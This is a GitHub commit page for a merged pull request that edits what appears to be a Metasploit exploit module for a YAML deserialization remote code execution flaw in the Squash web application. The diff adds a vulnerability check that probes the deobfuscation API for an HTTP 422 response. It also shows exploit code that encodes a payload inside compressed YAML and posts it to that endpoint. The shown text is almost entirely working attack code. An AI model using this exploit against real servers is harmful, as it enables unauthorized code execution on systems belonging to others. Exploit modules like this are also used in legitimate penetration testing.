Merge pull request #2 from CharlieEriksen/squash-rce

Adding a check and fixing TARGETURI
kernelsmith · Aug 6, 2013 · 5675baa · 5675baa
2 parents 78e2344 + 36bab2f
commit 5675baa
Showing 1 changed file with 13 additions and 1 deletion.
diff --git a/modules/exploits/unix/webapp/squash_yaml_exec.rb b/modules/exploits/unix/webapp/squash_yaml_exec.rb
@@ -45,6 +45,18 @@ def initialize(info = {})
 
 	end
 
+	def check
+		response = send_request_cgi({
+				'uri'     => "#{datastore['TARGETURI']}api/1.0/deobfuscation",
+				'method'  => 'POST',
+				'ctype'   => 'application/json',
+			}, 30)
+		if response.code == 422
+			print_status("Got HTTP 422 result, target may be vulnerable")
+			return Exploit::CheckCode::Appears
+		end
+		return Exploit::CheckCode::Safe
+	end
 
 	def exploit
 		code = Rex::Text.encode_base64(payload.encoded)
@@ -54,7 +66,7 @@ def exploit
 		payload = Base64.encode64(Zlib::Deflate.deflate(yaml)).gsub("\n", "")
 		data = "{\"api_key\":\"1\",\"environment\":\"production\",\"build\":\"1\",\"namespace\":\"#{payload}\"}"
 		send_request_cgi({
-			'uri'     => '/api/1.0/deobfuscation',
+			'uri'     => "#{datastore['TARGETURI']}api/1.0/deobfuscation",
 			'method'  => 'POST',
 			'ctype'   => 'application/json',
 			'data'    => data